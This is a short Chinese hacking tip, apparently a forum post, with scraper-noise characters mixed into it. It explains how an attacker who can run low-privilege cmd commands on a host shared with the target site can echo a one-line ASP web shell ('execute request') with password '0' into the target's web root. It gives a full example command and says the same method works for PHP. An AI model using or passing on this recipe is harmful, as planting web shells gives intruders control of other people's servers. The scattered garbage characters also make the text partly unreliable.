在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。9 q- T" }4 s; d3 e3 K# G& W- L" i4 y1 ^
. l: C! T: l6 |2 y& B$ P. U7 ]命令格式" f9 Z9 T/ W' I$ m# f
+ E: X' V: o. ]4 Z
Echo 语句 >目标站绝对目录) n9 G' l" u4 Q0 {9 k
% Z. V# L& Q; G* s1 g$ S4 O7 w
例如:
- \1 h7 ]0 j/ R$ D: L/ I9 H/ l- c9 w& O* c* w3 U5 V& o
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp$ K: L; U8 C3 q j. f/ \: D8 O- t9 y
( `# }, J& P0 }- B' S
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
4 K7 {1 I3 X- a0 p |